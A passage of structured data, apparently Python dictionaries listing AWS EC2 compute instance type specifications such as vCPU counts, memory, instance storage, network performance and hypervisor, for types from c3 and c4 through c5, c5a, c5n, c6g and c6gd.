'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 43008, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 43008}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 16, 
'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1], 'SizeInMiB': 32768, 'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 
'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.8xlarge', 
'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 32, 
'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 
'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 
'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1], 'SizeInMiB': 65536, 'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 
'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.6, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61952, 'TotalSizeInGB': 3360, 'Disks': [{'SizeInGB': 840, 'Count': 4, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'cc2.8xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.6}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61952}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3360, 'Disks': [{'SizeInGB': 840, 'Count': 4, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 
'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '50 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 
'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '50 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 
'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 